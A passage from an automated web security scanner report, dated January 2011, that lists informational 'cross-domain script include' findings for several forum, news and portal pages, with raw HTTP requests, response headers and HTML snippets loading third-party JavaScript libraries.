<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   WP7 -
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.113. http://forums.silverlight.net/forums/t/217726.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217726.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/t/217726.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23414
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:50 GMT; expires=Sun, 29-Jan-2012 23:18:50 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Callin
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.114. http://forums.silverlight.net/forums/t/217727.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217727.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/t/217727.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23123
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:49 GMT; expires=Sun, 29-Jan-2012 23:18:49 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Astero
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.115. http://forums.silverlight.net/forums/topicsactive.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/topicsactive.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/topicsactive.aspx?forumid=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73525
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:20 GMT; expires=Sun, 29-Jan-2012 23:17:20 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:21 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.116. http://forums.silverlight.net/forums/viewall.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/viewall.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/viewall.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73300
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:47 GMT; expires=Sun, 29-Jan-2012 23:20:47 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:47 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   All Th
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.117. http://forums.silverlight.net/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /search/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search/ HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23207
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:21:00 GMT; expires=Sun, 29-Jan-2012 23:21:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:41:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Search
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.118. http://forums.silverlight.net/user/viewonline.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 278417
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:19 GMT; expires=Sun, 29-Jan-2012 23:17:19 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:19 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.119. http://games.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: games.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-WR-L: 74,NC
Set-Cookie: MSGmSession=RUID=d177791d618543afa46923d904b9fd9b&Env=AP2; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:32 GMT
Connection: close
Content-Length: 45429


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta http-equiv=
...[SNIP]...
</style><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/gamecache.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery-1.4.2.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery-ui-1.8.1.custom.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery.mousewheel-3.0.2.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery.jscrollpane-1.2.3.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.core.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.widget.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.fbfeedformat.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/profilepage.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/invitefriend.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/json2.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/gb.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/common.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/friendcache.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/header.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/site.master.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/fasttrack.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/omniture/s_code.min.js" type="text/javascript"></script>
<script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/omniture/s_auxiliary.min.js" type="text/javascript"></script>
...[SNIP]...

23.120. http://glo.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://glo.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: glo.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:46:32 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="template" xmlns:fb=
...[SNIP]...
<meta property="og:image" content="http://static.glo.com/photos/ThumbNail/27126_ThumbNail.jpg" />


<script src="http://static.glo.com/cache/js/1293231430/c2lmci5qcw...js"></script>
<script src="http://yui.yahooapis.com/3.1.1/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d832529/3/847182/randm.js"></script>
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/12/842134/randm.js"></script>
...[SNIP]...
</div>

<script src="http://static.glo.com/cache/js/1293231430/b21uaXR1cmUuanM..js"></script>
...[SNIP]...

23.121. http://health.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://health.redacted
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: health.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA19
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1133fe74be594c568a34ac6ad24cff7a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=CE873C51A3AB43DBA17ADCF0FD9904FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:55 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

23.122. http://helenaspopkin.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://helenaspopkin.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: helenaspopkin.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:53:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=73fa8580b941fa2c3fb9c3b955a4d083; expires=Sat, 25-Jan-2031 17:53:02 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.123. http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual

Summary

Severity:   Information
Confidence:   Certain
Host:   http://informationarbitrage.com
Path:   /post/3007820135/start-fund-no-big-deal-business-as-usual

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /post/3007820135/start-fund-no-big-deal-business-as-usual HTTP/1.1
Host: informationarbitrage.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
X-Tumblr-User: informationarbitrage
Link: <http://tumblr.com/xxg1dqs0vb>; rel=shorturl
Link: <http://29.media.tumblr.com/avatar_52233725e86f_16.png>; rel=icon
Vary: Accept-Encoding
X-Tumblr-Usec: D=276465
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 14:47:50 GMT
X-Varnish: 1726456178 1726409864
Age: 22
X-Cache: MISS from rack1.tumblr.com
X-Cache-Lookup: MISS from rack1.tumblr.com:80
Via: 1.1 varnish, 1.0 rack1.tumblr.com:80 (squid/2.6.STABLE6)
Connection: keep-alive
Content-Length: 33469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</style>
<script src="http://www.iaventures.com/InformationArbitrage/Scripts/AC_RunActiveContent.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js">
</script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
<!-- Start Tumblr Tag Cloud -->
<script type="text/javascript" src="http://www.iaventures.com/InformationArbitrage/jquery.js"></script><script type="text/javascript" src="http://www.iaventures.com/InformationArbitrage/widget.js?css=default&minsize=80&maxsize=130"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="linkedin">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
<div id="facebook">
                                                       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.124. http://ingame.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ingame.msnbc.msn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: ingame.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:08:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124879


<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>In-Game</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/558ca37303d3238a5e6416f8159a3db95dda2455.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/a49e2edd06ea3021c364449ff5b7671d97b3c46e.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/ingame/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
